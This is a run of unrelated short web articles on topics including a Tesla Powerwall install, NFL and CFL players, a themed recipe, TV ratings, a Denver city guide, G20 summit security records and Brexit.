Following instruction on an iPad , they moved on to connecting the system to his solar installation and his house electrical system . A few hours later , they were done :
“ All cabling done . There is a clamp on the solar active input to measure its generation , and the gateway measures the house load from the power cable directly . The PW2 charges only from solar at the moment . ”
Michael shared a few pictures on the forum :
Then it was Tesla 's turned to activate the device :
“ Tim from Tesla arrives to commission the unit . It has a Wifi AP ( TEGxxxx ) and a Telstra 3G sim , but the sim has yet to be activated by Telstra , so Tim connects it to my home Wifi and uses a webpage to update the firmware . He says that the preferred connection method in future is via 3G so they do not need to rely on Wifi availability . The installer used an iPad to connect to the PW2 Gateway 's AP , and defined the size of the solar , which inputs are monitoring the load and generation , and entered my Tesla account login . ”
The installer said that he would be able to start monitoring his system through the new Tesla app within a day .
Michael will now be able to consume more of his own solar power in order to optimize his solar system and to keep the lights on in case of a power outage .
He added that Tim said that they currently have “ thousands ” of orders in Australia for the Powerwall 2 and that the backlog is about 2 months for someone ordering now .
It 's not surprising considering Australia is one of the places where the Powerwall 2 's economics make the most sense . Some homeowners have calculated that it can pay for itself in 6 years .
Anyone who 's been paying attention to Philadelphia Eagles quarterback Carson Wentz knows that he 's a Christian who openly shares his faith in God — and he has no plans of stopping anytime soon .
“ I always tell people , for example , if you love your job , you love your wife , you love what you do , you 're going to talk about it , ” Wentz recently told CSN Philly . “ Well , I love Jesus . That 's what I love , so I 'm going to talk about it . ”
The 24-year-old NFL star admitted , though , that he is sometimes walking a fine line , as he does n't want to “ force it down ” anyone 's throat . In the end , Wentz said that living out his faith is the most important thing he can do .
You ca n't earn grace . It 's free . It 's the greatest gift there 's ever been & will be . Accept it . Jesus is waiting for you & loves you # AO1 — Carson Wentz ( @ cj_wentz ) June 4 , 2017
“ At the end of the day , just kind of how I live and what I 'm about and hopefully can kind of speak through , ” he said . “ I never want to be the guy who 's beating people over the head with the Bible . That 's not what I 'm about . That 's not really what Christianity is about .
Wentz continued , “ Christianity is all about love and showing that love and that kindness and that grace . ”
While he said he knows that some people speak negativity of his frequent faith messages , he 's not too concerned and has no plans of stopping his faith chatter .
Wentz said he hopes to use his platform “ to make a difference [ in ] peoples ' lives ” and his AO1 foundation aims to do just that ; it 's an effort aimed at assisting the less fortunate .
Never underestimate the power of prayer ! God longs for that intimate time with you ! — Carson Wentz ( @ cj_wentz ) September 4 , 2017
“ Similar to Carson 's life motto and the tattoo on the underside of his right wrist , Carson 's foundation stands for ‘ Audience of One , ' ” an official description reads . “ No matter what he does in life , Carson is living for an Audience of One — Jesus . ”
As Faithwire previously reported , the Eagles are a pretty faith-filled team . In fact , ESPN published an article last year , revealing how team members “ find common ground through spiritual devotion , ” with players routinely engaging in Bible studies , baptisms and other faith-affirming activities .
It 's a fascinating situation in which a large number of team members vocally place their Christian faith above anything else .
( H/T : CSN Philly )
The long snapper is an integral part of the functions of punters and kickers , yet they 're absurdly ignored at all-star time .
Never , it seems , has the football player who views the world from an upside-down perspective been more valuable — and yet , paradoxically , taken for granted .
That 's the curious lot of long snappers in the Canadian Football League : If you do your job well , nobody notices .
“ I think it 's the only position that if you do n't do it 100 per cent , you lose your job , ” says B.C . Lions ' long snapper Mike Benson . “ Do it right , nine times out of 10 , but snap one over the punter 's head , you 're fired . As soon as snapper misses one , they 're probably looking at somebody else . ”
In addition to snapping the ball on the money to the punter in less than .8 of a second , long snappers must block in protection , then release and get downfield to make a tackle — like the audacious one Benson made that stopped speedy Brandon Banks of the Hamilton Tiger-Cats in his tracks .
“ That 's one of my personal highlights , ” Benson says . “ He ( Banks ) did n't get a single yard on that return , and he 's one of the fastest returners in the league . My goal this year is to have a special teams tackle in every game . My goal , every game , is to make a difference . ”
Despite the punter 's demonstrated strategic importance , and the kicker 's ability to decide games with one swing of the leg — though shorter , the snap-for-placement is often more pressure-packed , since victory is at stake — the long snapper who is an integral part of their function is absurdly ignored at all-star time . It 's absurd because Benson has an all-star bonus written into his contract , though he has zero hope of achieving it .
“ I have an all-star bonus . It just sits there , ” he says .
Kickers and punters get love from the media , coaches and fans when picking the best at their position . But no long snapper has ever been selected for a CFL all-star team . Even the CFL Players ' Association , which collects dues from its members , including the long snapping fraternity , does n't have a spot for a long snapper on the CFLPA all-star ballot .
And the CFL is not unique . In the National Football League , a box for long snappers is not included on the all-star ballot either . Snapping specialists fall under the category of “ coach 's choice ” for Pro Bowl selection .
“ The kickers have two ballots — one for kicker and one for punter , ” Benson says . “ There 's no long snapper . I had this conversation last year on Twitter with Randy Chevrier ( now retired from the Calgary Stampeders ) and Ryan King ( Edmonton Eskimos ' long snapper ) . It 's literally impossible for us to become all-stars . We play a vital role , making perfect snaps , running downfield making tackles . It 's a noteworthy position , especially in Canadian football . It 's kind of unfair . When the all-stars come out , we tweet to people — ‘ Hey , long snappers are people , too . ' We have feelings . ”
Just because their work is anonymous , though , does n't mean they 're anonymous people .
King of the Eskimos advertises his craft in a YouTube video in which he makes like William Tell , hiking a perfect strike to knock a Coke can off the head of his 12-year-old nephew , Josh , who challenged him to do it . It required one take .
“ You do weird things like that , find new ways to challenge yourself , ” King says . “ People do n't realize how precise a long snapper has to be . The rest of the time , my main focus is studying punt returns , coaches ' systems , figuring out what they 're going to do . Because we also have to have the ability to get down there and make tackles . ”
Jorgen Hus , the long snapper of the Saskatchewan Roughriders , became a YouTube sensation a few years ago when he put out clips of himself snapping through the window of a passing car or nailing one into a plastic garbage can across the street .
“ I was just messing around on a Saturday afternoon , doing some trick shots with a video camera , ” Hus says . “ Nobody knew about it for two years . Then , it just blew up when I joined the St. Louis Rams . It was just kind of crazy . ”
While Benson acts as a kind of unofficial , self-appointed shop steward to advance the cause of long snappers for all-star consideration , Hus maintains he 's “ not going to lose any sleep ” over it .
“ Everybody wants a little recognition at the end of the day , whether you 're a punter , a kicker or a long snapper , ” he admits . “ But a long snapper really wants to be under the radar . When people are talking about long snappers , it 's usually for the wrong reasons . It 's part of the culture . If we play a perfect game , nobody knows it . ”
Among their hunched-over fraternity , Chad Rempel of the Winnipeg Blue Bombers stands tallest . If there were to be a CFL long-snapping all-star , the 35-year-old from Saskatoon — who appears in how-to videos by American special teams guru Gary Zauner — would be at the top for consideration .
“ Hands down , he 's the best , ” Hus says . “ He 's honestly high NFL calibre . He makes the job really easy for the punter and kicker . ”
“ Remp is the best at what he does , ” adds Lions special teams coach Marcello Simmons . “ Ryan King in Edmonton is good as well . ( Jake ) Reinhart in Toronto is good . Aaron Crawford in Hamilton . Mike ( Benson ) is right up there with those guys . You can go across the board and see the importance of these guys through the league . Anonymous ? It depends on your point of view . To coaches , special teams coordinators and players they 're nothing of the sort . They 're of utmost importance . ”
So raise a glass of long overdue appreciation , then , to those unheralded snappers constantly told to take a hike , especially at all-star time .
Bottoms up !
mbeamish @ postmedia.com
Twitter.com/sixbeamers
Heat your home with recycled aluminum cans ? It 's a simple idea , and one that many will look at and say , “ Why did n't I think of that ? ”
It works through a simple heat transfer process . The cans are painted black , stacked into columns , and modified to allow air to move through them . The sun heats the cans , and the heat is transferred to the air as it moves up through the columns and into the room .
These 240 can unit reportedly heats up to 10,000 BTUs or more , according to the company , and is “ maintenance free ” .
via : Youtube – “ Jim Meaney , owner of Cansolair Inc. displays how he converts pop cans into a powerful solar heating panel. ” “ …Cansolair Inc. has developed a forced convection solar heating unit called the Model RA 240 SOLAR MAX . A dwelling of 1000 square feet can have a complete air change in 1.5 hours . Working experience indicates that comfortable room temperature can be maintained in a 1000 square foot dwelling with 15 minutes of sunlight per hour… ” via : http : //www.solarrochester.com/cansolair.asp
A single unit may not heat an average sized American home ( 1500-2500 square feet ) by itself . It will , however , supplement the heating .
Specifically speaking , a unit this size is suited perfectly for a tiny house or cabin 1000sqft or less . There are also many variables that must be considered when determining heating efficiency of any building or home .
Insulative factors of the home , proper sealing of all doors and windows , orientation of the home toward the south , vaulted ceilings , and total cubic feet of space within the home minus any furniture , and of course , the amount of sun that shines on the home , are all factors that affect efficiency .
Important Note : With the addition of a thermal storage system , ( i.e . a hot water tank or tank filled with veggie oil ) one could store heat for days , and use it during periods of darkness and on cloudy days .
Could you heat your home with just one unit ? Sure . But it also depends on how big your home is .
Live small . Go tiny . Stay warm .
When I started playing StarCraft II : Wings of Liberty , I always feared the infamous Zerg baneling bust . I would religiously scout at 10 supply so I could catch the Zerg 's fast gas . The moment I saw that , I went into full barricade mode… PULL SCVS OFF GAS ! BUILD MORE BARRACKS ! THIS IS NOT A DRILL !
I remember I held off a pretty fierce baneling bust and my opponent said , “ Wow , you 're one of the first to hold that . GG ” . Dang , that felt SO good ! Getting a compliment from a complete stranger in a video game always boosts my ego .
However , most games did not go so smoothly back then . I 'd get caught off guard and BOOM , my supply depots would just explode and my entire base would be covered in baneling pesto ! Err , I mean baneling acid guts . I suppose the baneling 's acid looks suspiciously similar to basil pesto , right ?
UNIT COMPOSITION
FOR THE GNOCCHI
salt 1/4 teaspoon of nutmeg 1 egg 1 cup of ricotta cheese 1 scoop of Quest Brown Rice Powder 2 scoops of Quest Multi-Purpose Mix Protein Powder
FOR THE BASIL PESTO
salt pepper 3 – 5 cloves of garlic 1 tablespoon of pine nuts ( reserve some for later ) 2 tablespoons of parmesan cheese 2 tablespoons of olive oil * 1/2 cup of basil
( you may end up with extra pesto ! )
* you may need to add more to get a smoother consistency
BUILD ORDER
Adapted from The Splendid Table
This recipe takes about 20 minutes to prep . Cook time is < 5 minutes . This makes about 3 servings .
Each serving contains : ~36g of Protein , ~26g of Fat , ~12g of Net Carbs
OPENING
In a bowl , combine your ricotta cheese with your egg . Stir until thoroughly mixed . Sprinkle in 3/4 of a scoop of brown rice powder . Stir until combined . Add in your two scoops of protein powder , salt , and nutmeg . Mix until you get a doughy consistency .
MID GAME
In a food processor , combine 1 tablespoon of olive oil , basil , pine nuts , garlic and parmesan cheese . Remove about 2 tablespoons of the mixture and set aside . Continue adding your remaining tablespoon of oil or until you 're happy with the consistency of your pesto .
LATE GAME
Coat a clean surface with 1/4 a scoop of brown rice powder . Knead your dough into a ball . Cut this ball in half . Add 1/2 to a bowl and mix pesto into it to create the baneling 's acid sacs .
With the other half , cut it into 4 equal sections and roll them into long noodles.Then , cut these noodles into smaller 1″ portions . You should get about ~12 of them . Then , take your pesto-infused dough and create small spheres for each of the gnocchi . This dough will be much more difficult to handle due to the pesto 's oil . Attach each sphere to the gnocchi . You can also add eyes to the baneling by carefully placing some extra green gnocchi dough on its face .
Take 4 pine nuts and place them into the sides of the gnocchi.These will become the baneling 's feet . Boil your water and season with salt . Carefully drop each gnocchi into the boiling water . The gnocchi will float to the surface when they 're almost ready ( should take about ~2 minutes ) . I recommend cooking them in separate batches so they do n't stick to one another . Remove the gnocchi using a slotted spoon . Plate your gnocchi and serve with your pesto . Eat !
GG WP !
Mine came out a bit more squished than I wanted ( I crowded the pot too much ! ) … but they were still pillowy soft and protein packed !
If you enjoyed this recipe , please check out another one of my Zerg-friendly Quest recipes : Spawning Pools !
—————————————————————————————————————
This recipe was created with support from Quest Gaming . Follow them on Facebook , Instagram and Twitter to learn more about how other gamers eat healthy and # CheatClean .
Scientists are making strides in a new cancer treatment that manipulates patients ' immune systems into going to war with malignant growths . The therapy , which could apply to a wide range of cancers , offers a silver lining for patients who have been diagnosed with melanomas in the the lungs , bladder and gastrointestinal tract .
In a study recently published in Science by the National Cancer Institute , under the National Institutes of Health , doctors “ sequenced the genome ” of a 43-year-old woman named Melinda Bachini , who had been struggling with a type of cancer that had not responded to chemotherapy , the New York Times reported .
The Brief Newsletter Sign up to receive the top stories you need to know right now . View Sample Sign Up Now
Through what is called “ adopted cell therapy , ” Dr. Steven A. Rosenberg and colleagues involved in authoring the study “ identified cells from her immune system that attacked a specific mutation in the malignant cells . Then they grew those immune cells in the laboratory and infused billions of them back into her bloodstream , ” said the Times .
Rosenberg told the Times that through the process , the tumors began “ melting away. ” He added , “ It 's the first time we have been able to actually target a specific mutation in the immune system , ” Rosenberg told NBC News .
Contact us at editors @ time.com .
via David Roth
This month , Diet Coke unveiled its latest campaign to get you hopelessly addicted to sugary garbage . In San Francisco , the ads have been marketed toward the niche tech sect , while here in NYC they seem focused on the kind of people who say things like , `` for our generation of artists , we realize that we are each our own brand . '' But maybe it was n't the best idea to craft an ad campaign design that unsubtly nods toward cocaine addiction , as everyone who has seen the ads has noticed .
This is real . Coca-Cola 's new slogan really seems to be `` You 're On Coke . '' pic.twitter.com/3sTHTFPmXO — David Roth ( @ david_j_roth ) March 1 , 2014
Wait , does this ad really say , `` You 're on Coke '' ? pic.twitter.com/QO2urebSnF — Patrick Carone ( @ pjcarone ) February 26 , 2014
`` You 're on coke . '' I see what you did there , @ DietCoke ! pic.twitter.com/P3QsWOkLEg — John McDermott ( @ mcdermott ) February 24 , 2014
`` You 're on coke . '' Huh . Really ? Seems like a questionable choice in tag line to me . pic.twitter.com/3gYJnqKjpb — josh berta ( @ prttyshtty ) February 26 , 2014
Obviously the campaign is n't `` You 're On Coke . '' Technically speaking , it 's `` You 're On . Diet Coke . '' As Stuart Kronauge , general manager for sparkling beverages at Coca-Cola North America , explained to the Times , the campaign `` presents Diet Coke helping Taylor Swift and other millennial women and men by providing an energetic 'uplift for those moments when you really need to be on . ' '' For the Swift TV ad , they switch the phrase around to emphasize , `` Diet Coke , You 're On . ''
But for everyone looking at the printed ad from any distance , the stand-out words are YOU 'RE ON COKE . And there 's little doubt that Droga5 , New York , who created the campaign , did n't realize this and giggle to themselves about how clever it was .
If Diet Coke is looking for some new ideas to continue expanding the ads , there 's plenty of material to work with .
@ david_j_roth `` Someone really needs to explain why it 's so goddamn bright in here . You 're on Coke '' — Mike Piellucci ( @ mikelikessports ) March 1 , 2014
@ cushbomb @ david_j_roth `` You 're in New York with the cash in your pocket and your eyes on that park cop . You 're on Coke . '' — Sara Kate W ( @ SaraKateW ) March 1 , 2014
@ david_j_roth `` You spend an entire party having a one-sided conversation about gluten at an escalating volume . '' — Matt Christman ( @ cushbomb ) March 1 , 2014
@ Tulletilsynet @ twitlofsky @ david_j_roth You 've been riding the C back and forth for 7 hours . You 're on Coke . — Rhiannon ( @ OpheliaInWaders ) March 1 , 2014
@ david_j_roth You moved to New York with 10 grand from your pops , a job at Goldman , and a place in Murray Hill . You 're on Coke . — Rap Game Mr Lebowski ( @ twitlofsky ) March 1 , 2014
California Plans to Tax Space Travel
The pathologically excessive greed of progressives ensures that if free market space travel really takes off , it wo n't launch from the Land Ruled by Fruits and Nuts :
The earthly convention of paying taxes may soon extend into outer space , if California regulators have anything to say about it . The state 's Franchise Tax Board is seeking public comment on its proposal for computing taxes on commercial space transportation companies . … It would apply to companies that use California as a launchpad , not California companies launching from other states , like Texas or Florida . … Trending : The 15 Best Conservative News Sites On The Internet SpaceX , which is headquartered in Hawthorne ( Los Angeles County ) , declined to comment .
John Logsdon , a professor emeritus at George Washington University , states the obvious :
“ States that do n't levy taxes would have that competitive advantage over states that do , ” Logsdon said . “ If California puts in a tax and Florida or Texas does n't have a similar tax , I 'm not sure that helps California in a competitive way . ”
Sure enough ,
At least one company has already been lured away from California… Moon Express , a company working to mine the moon for natural resources , moved from Mountain View to Florida .
No worries . When the commercial spaceflight industry abandons California because it is not profitable to do business there , Governor Moonbeam can just jack up taxes even higher on those who remain behind . Soon California tax rates will shoot past the SpaceX rockets as they climb through the stratosphere .
Governor Moonbeam will tax you even in outer space .
On a tip from Sufferfortribe . Cross-posted at Moonbattery .
You Might Like
What is it ? UFO seen in new NASA image of Mars
A genuine NASA image , released by the US space agency this week after it was beamed back from the Curiosity rover droid currently exploring Mars , was found to have the dark disc object in the distant sky .
It was found by UFO investigator Scott C Waring , a USA ex-pat based in Taiwan , who claims he has ruled out it being a smudge on the lens .
He revealed the picture on his website , posting : `` This is a UFO from the most recent photos from Curiosity rover this week .
`` It has a dark disk and is not an anomaly stuck to the lens .
`` I checked other photos from the same camera and it is not there , therefore its not on the lens .
`` It is flying in a horizontal position and observing the rover from a distance . ''
Fox 's “ Lethal Weapon , ” glorying perhaps in a full-season pickup , was up from last week in Nielsen 's preliminary ratings with a 1.9 in the advertiser-coveted 18-49 demographic and 6.69 million total viewers . ( It also grew from the first half hour to the second . )
Comparisons to last week 's ratings are tough , though , since large parts of the southeastern U.S. were experiencing preemptions for local coverage of Hurricane Matthew 's impending devastation .
That said , a bump is a bump , and it 's encouraging , particularly given that “ Lethal Weapon ” has shown it can add on another couple tenths of a point in the ratings that matter to advertisers .
Following “ Lethal Weapon ” on Wednesday night was “ Empire , ” which seems to have hit a plateau from its previous precipitous drops from last season — it was actually up a tenth from last week in the demo , weighing in with a 3.4 demo rating and 9.3 million total viewers .
ABC had its usual two hours of comedy followed by “ Designated Survivor , ” all mostly steady with last week . “ The Goldbergs ” drew a 1.8 in the demo and 6.4 million viewers . “ Speechless ” came in with another 1.8 and 5.99 million total viewers . “ Modern Family ” improved two tenths form last week , to a 2.4 in the demo and 7.45 million viewers ; “ Black-ish ” had a similar uptick with a 1.6 demo rating and 5.88 million viewers .
Related TV News Roundup : Malcolm-Jamal Warner to Guest on ‘ Lethal Weapon '
“ Designated Survivor ” came in with a 1.6 and 7 million viewers , beating the snot out of its time slot competition and improving on the demo and total audience of its lead-in , which should cheer up ABC execs .
NBC 's “ Blindspot ” is continuing its downward trend in its new-for-this-season Wednesday night slot , weighing in with a 1.1 demo and 5.43 million viewers . “ Law & Order : SVU ” and “ Chicago P.D. ” both contributed a 1.1 to NBC 's demo pile , with total audiences of 5.71 million and 6.14 , respectively .
CBS 's “ Survivor ” started the night off well enough , with a 2.0 in the demo ( up from a 1.8 last week ) and 9.01 million viewers .
The CW 's “ Frequency ” continues to not be much of a live-same-day draw , though it held steady with its premiere demo rating of a .4 and an audience of 1.11 million . “ Arrow , ” its lead-in , is holding steady with a .7 demo and 1.95 million viewers .
As a caveat , yes , most of these shows will see large lifts — anywhere from 50 % to more than 100 % — once viewing within three and seven days is counted .
DENVER CITY GUIDE
Welcome to Denver
Overlooked by the scenic Rocky Mountains , Denver is one city in which residents never run short on entertainment . Whether one is looking for high style entertainment and dining , or simply to have fun on a budget , Denver is the place . Residents may dine on buffalo , rattlesnake , or Rocky Mountain Oysters , and may enjoy activities as varied as skiing , shopping , watching basketball games , and paleontology . Some of the highlights of Denver you 'll want to visit time and again include the Denver Art Museun , Red Rocks , Zoo , Aquarium , Butterfly Pavilion , the 16th Street Mall , the Six Flags Elitch Gardens Theme Park , and the Buffalo Bill Museum and Grave .
It began as the Denver Artists ' Club in 1893 and for decades had a nomadic existence . Nearly 120 years later , it showcases more than 70,000 works throughout a 350,000-foot permanent campus highlighted by a stunning , ultra-modern structure designed by Italy 's renown Gio Ponti . And “ Becoming Van Gogh , ” a world-exclusive exhibit , has cemented its global stature . The museum 's nine collections include American , African , Native American , Asian and European works , as well as pre-Columbian , Spanish Colonia , textile and , of course , Western American art . The museum also provides abundant educational programs , and features a special children 's art center . Insider 's tip : General admission is free on the first Saturday of each month .
Arguably the best open-air concert venue in the world , this dramatic setting has hosted everyone from the Beatles to U2 to currently hot Mumford & Sons . Formed naturally from red sandstone outcroppings , it 's also a top destination for hiking and mountain biking , and yoga enthusiasts and other fitness fans use it to drink in the outdoors while working out . It 's most busy in the summer , with a full music line-up , as well as an outdoor movie series . Insider 's tip : Want a breathtaking setting for your wedding ? Book Red Rocks .
Yes , this is where the wild things are – 4,000 of them . Giraffes , kangaroos , camels , rhinos , elephants , zebras , flamingos , gorillas , polar bears and more are here in special habitats , including Tropical Discovery , Predator Ridge , Primate Panorama , Northern Shores , Bear Mountain and the Dragons of Komodo exhibit . Founded in 1896 , the zoo prides itself on its extensive preservation programs . Nearly 200 of its 700 species are considered threatened or endangered -- - three are already extinct in the wild . Conservation is at the heart of the zoo 's mission , and the entire 80-acre campus regularly earns top honors for its sustainable practices . Insider 's tip : While the zoo participated in early efforts to save the iconic American bison from extinction , do n't expect to find any here . The only herd ( about 40 ) now roams Genesee Park , just west of metro Denver .
Dive into more than a million gallons of underwater exhibits at this aquatic extravaganza – literally . That 's right : You can snorkel amid sea creatures great and small . Or opt to view myriad marine life from outside the tanks . Catch the Mystic Mermaids show , a family-friendly performance with an eco-minded message . Or can dine , drink or party with more than15,000 exotic fish -- including a few sharks -- as the exotic backdrop ( the aquarium features an upscale restaurant and lounge and often hosts birthday and other celebrations ) . Insider 's tip : Do n't miss the rare Sumatran swimming tigers . Did you know they have webbed paws ? Neither did we !
The Butterfly Pavilion , the first stand-alone non-profit insect zoo in the nation , is home to over 1,200 butterflies . Nature lovers can walk through the outdoor butterfly gardens , explore the nature trail , watch adult butterflies emerge from chrysalises , or explore the habitats of many other species of insects both rare and common .
Both adults and children will love the new experience the Butterfly Pavilion provides to visitors . It is located just outside Denver , at 6252 W 104th Ave . Admission is $ 8.50 for adults , $ 6.50 for seniors , $ 6.50 for children ( 2-12 ) and free for kids under 2 years old .
Denver 's sprawling , sixteen-block mall , with shuttles that run from one end to the other , is the shopper 's paradise . The mall has been nominated multiple years for `` Best Shopping Area . '' It contains all the shops and food stops you would typically expect to find at a mall , with specialty features such as high-end restaurants , day spas , and copy centers . You name it , it 's there .
The walkway that runs from one end of the mall to the other is a popular spot to walk or jog in the morning , but if you prefer not to walk from end to end of the mall , not only are the shuttles free of charge , it 's also possible to get a ride in a horse-drawn carriage to the destination of your choice .
For those who enjoy roller coasters , this theme park , located in downtown Denver , provides a unique experience for park-goers to enjoy the view of the city from the peak of a roller coaster . Another famous lookout spot in the park is the top of the Total Tower , which provides a great view in every direction . Along with great scenery and plenty of rides , these Six Flags features a tropical water park , free with admission to the park . One adult day pass costs $ 37.99 , day passes for individuals 4 '' or shorter ( restricted use ) cost $ 21.99 , and children age 3 and under have free admission . A more economical option is the season pass ; one season pass costs only $ 49.99 .
If you 're a Wild West buff , Denver has plenty to offer . Along with being the home to the filming of Indiana Jones and the Last Crusade , and having a Western History section in the expansive public library , Denver is home to the grave of `` Buffalo '' Bill Cody , legendary mountain man , along with a nearby Buffalo Bill museum .
Only 30 minutes from downtown Denver , the grave and museum are located among wildlife and Ponderosa Pines on Lookout Mountain , which , with its great view of Denver , is aptly named . Touring the museum is an inexpensive activity , prices stand at $ 3 for adults , $ 2 for seniors , $ 1 for children under age 15 , and free for children under age 6 .
Have Fun in Denver !
Few metro areas offer such a wide assortment of museums , parks , activities , bars , and unique dining experiences . We 've only mentioned a few of them here . Some of the other most notable attractions include the Colorado History Museum , Water World , and professional sports teams such as the Denver Broncos and Denver Nuggets . If you 're moving to Denver any time soon , be forewarned that it may take a lifetime to experience all the city has to offer .
Like Us here on Facebook :
Check out my new spray-painting “ tent. ” I do n't have a garage , and I do n't like to spray paint inside my apartment . Spray painting outside is also problematic because of the lovely ocean breezes . Then I found a plastic wardrobe discarded on the side of the road . It was n't sturdy enough to hold clothes , and it was covered in rips . A few pieces of white duct tape , and it was good to go . I simply turned it upside down and laid down a sheet of cardboard to create a spray-painting tent . Works like a charm . The tent blocks the wind while spraying and keeps what 's inside dust free while it dries . Plus it keeps the overspray from floating everywhere . The trick : Zip the flaps closed after each coat and wait about 30 minutes while the paint dries and the dust settles .
Along with terrorism and organized crime , “ embarrassment to the Canadian government ” was considered one of the threats facing security forces at the G8 and G20 summit meetings in Ontario 2010 , according to newly released military records .
It 's no surprise to learn that officials were worried about potential threats from terrorist organizations such as al-Qaida , “ lone wolves ” not affiliated with any established terrorist group , foreign spies as well as protest groups and criminals .
But , say Canadian Forces planning documents , grouped in with such threats was “ Embarrassment to the Gov't . ”
[ np-related ]
Although the documents do not detail what would be considered embarrassment , the mass arrests and police abuses from the summits held two years ago in Toronto and Huntsville are still reverberating throughout government and police agencies .
Last month , the Office of the Independent Police Review Director released a scathing report concluding that police used “ excessive force , ” ignored civil rights and made “ unlawful ” mass arrests in cracking down on protests at a G20 summit in Toronto . As a result , some have called for the resignation of Toronto 's police Chief Bill Blair .
“ What occurred over the course of the weekend resulted in the largest mass arrests in Canadian history , ” Gerry McNeilly , head of the police review office , said in his report . “ These disturbances had a profound impact not only on the citizens of Toronto and Canada generally , but on public confidence in the police as well . ”
McNeilly 's report stated , “ Some police officers ignored basic rights citizens have under the Charter and overstepped their authority when they stopped and searched people arbitrarily and without legal justification . ”
“ Numerous police officers used excessive force when arresting individuals and seemed to send a message that violence would be met with violence , ” the report added .
Some 20,000 police from across Canada were involved in security at the summit sites . The joint Canada-U.S. military command NORAD as well as the Canadian Forces Canada Command , Canadian special forces and U.S. Defence Department personnel provided support for security forces .
The Canadian Forces prepared its plans in February 2010 for both summits , according to documents obtained by the Ottawa Citizen under the Access to Information law .
Among the terror groups listed as being a threat to the gathering of world leaders were al-Qaida , Hezbollah , Hamas , Tamil Tigers and Sikh extremists . “ Separatists ” were also listed as a threat but the documents do not explain whether those were Quebec separatists or another such group .
The Canadian Forces planners , however , predicted “ predominately peaceful protests . ”
“ This may include blockades of major routes in/out of Summit sites , ” they added .
Canadian military planners pointed out in a “ protest profile ” that up to 90 per cent of those who were going to protest at the summit meetings could be considered “ passive ” and that only between two to four per cent were expected to be violent . Again , the issue of “ embarrassment ” was highlighted .
The Canadian Forces could not provide an explanation of how its planners came to such conclusions but in similar past operations the military has relied on intelligence gathered by government security teams made up of various agencies including the RCMP and the Canadian Security Intelligence Service .
Some of the information in the Canadian Forces documents was listed as coming from the government 's Integrated Threat Assessment Centre . The centre brings together the various participants in Canada 's security intelligence community ó from the Canadian Security Intelligence Service to police forces ó to provide the government with the counter-terrorism information , the government points out .
Among the potential targets listed in the Canadian Forces planning documents were summit delegations , civilians , critical infrastructure and security personnel .
Canadian military personnel were not to be involved in arrests , according to the documents . But the plan noted that military personnel might be called to testify in judicial proceedings and that the RCMP should be told of the Canadian Forces requirement to “ protect any classified or sensitive information and capabilities . ”
The military began preparing for the G8 and G20 summits in the fall of 2009 .
Military divers were provided to search waterways for explosives as well as specialists in chemical , biological and nuclear decontamination . Members of the Ottawa-based counter-terrorism unit , Joint Task Force 2 , were also on standby .
Previously released documents show the RCMP and various Ontario police forces spent months infiltrating protest groups before the summits .
Postmedia News
Image copyright Reuters Image caption Leo Varadkar said his government did not want to undermine the union between Northern Ireland and Great Britain
Ireland 's prime minister has said he understands the sensitivities surrounding Brexit and the border issue for unionists in Northern Ireland .
Leo Varadkar made the comments during an interview with Irish broadcaster RTÉ .
He said the Irish government did not want to undermine the union between Northern Ireland and Great Britain .
It comes after Mr Varadkar met with the president of the European Council Donald Tusk on Friday .
The taoiseach ( Irish prime minister ) told RTÉ that Brexit had caused some difficulty in relations between Britain and the Republic of Ireland .
`` Irish-British relations were at their closest ever , and then came Brexit , '' he said .
`` Brexit is not our policy , Brexit is their policy . It is a disruption and it is causing problems for us '' .
Image copyright RTÉ Image caption Donald Tusk met with Leo Varadkar in Dublin on Friday
He added that his government are `` not looking to change the constitutional status of Northern Ireland '' .
`` We want the Good Friday Agreement to work , '' he said .
`` We 're totally committed to that as a government . We 're not looking to replace it with something new .
`` What we want is just practical common sense . We want people to be able to cross the border , just like they do now . ''
Last week , the DUP 's Sammy Wilson said any attempt to `` placate Dublin and the EU '' could mean a withdrawal of DUP support at Westminster .
He was responding to reports of a possible strategy to deal with the Irish border after Brexit .
The story suggested that British and EU officials could be about to seek separate customs measures for Northern Ireland after the UK leaves the European Union .
The DUP struck a deal with Prime Minister Theresa May 's government in June , agreeing to support Tory policies at Westminster , in return for an extra £1bn in government spending for Northern Ireland .
Seoul batted away a proposal by the U.S. for fighter jets from Japan , the U.S. and South Korea to fly in formation over South Korea in response to North Korea 's nuclear tests , the Asahi Shimbun reported Tuesday .
The U.S. sounded out the idea immediately after the North 's latest nuclear test , but Seoul demurred , citing fierce resistance here to any renewed Japanese military presence , a source told the daily .
Instead , a couple of the U.S. ' B-1B bombers buzzed South Korean skies last month as a show of force . The U.S. had hoped to make the event a show of unity among its allies in the region , who are roughly pitted against an alliance between China and North Korea .
Japan in turn refused South Korean F-15Ks fighters permission to pass through Japanese airspace en route to a multinational aerial exercise in Alaska earlier this month .
Tokyo said it reserves permission to overfly for the U.S. , which has a status of forces agreement with Japan , the newspaper added .
South Korea 's Defense Ministry denied the report .
The Thinking Atheist 's Seth Andrews and Matt Dillahunty recently took a little field trip to Ken Ham 's Ark Encounter — the giant creationist theme park designed to teach children that the bible is literally true and the earth is around 6,000 years old .
It was raining during their visit to the “ $ 100,000,0000 paperweight , ” which prompted Andrews to point out that Ham 's giant replica of Noah 's Ark was “ looking a little rough around the woodwork ” due to the elements , which prompts the question of how the actual ark might have fared on actual seas . ”
Andrews took note of the suspiciously empty parking lot and that the “ ark is n't really an ark , ” due to the fact that the back half of the structure was a building , “ which is something I do n't remember hearing about during all the fundraising press conferences . ”
And then there were the dinosaurs . Yes , dinosaurs .
After giving a rundown of what can be found inside the ark exhibit , Andrews pointed out another common theme : “ Tons and tons of guilt . ”
“ The Ark Encounter is loaded with guilt . Guilt for being born human . Guilt for being so icky and sinful . Guilt for making God angry enough to drown us all in the first place . ”
“ The Ark Encounter certainly was expensive to build , ” Andrews said . “ How did Noah manage to build an ark with only trees and tar , while it took Ken Ham over $ 100,000,000 , a huge construction crew , and state of the art equipment ? ”
According to Andrews , the Ark Encounter is a “ church masquerading as a tourist attraction and it 's a tragic waste of resources . ”
Watch the video below :
Featured image via screen grab
The Florida Gators new head coach Jim McElwain is n't wasting anytime in getting started recruiting as he will hit the road on Monday to visit prospects .
On Sunday McElwain got a surprise on campus visit from Florida offensive line commit Tyler Jordan ( 6-5 , 270 , Jacksonville , FL Bishop Kenny ) and Jordan was very impressed by the Gators new head coach .
“ I drove up to campus today ( Sunday ) to meet with Coach McElwain , ” Jordan said . “ It went really well . My first impression of him was that he was a really good guy and has a great personality . I think he 's going to do really well at Florida . ”
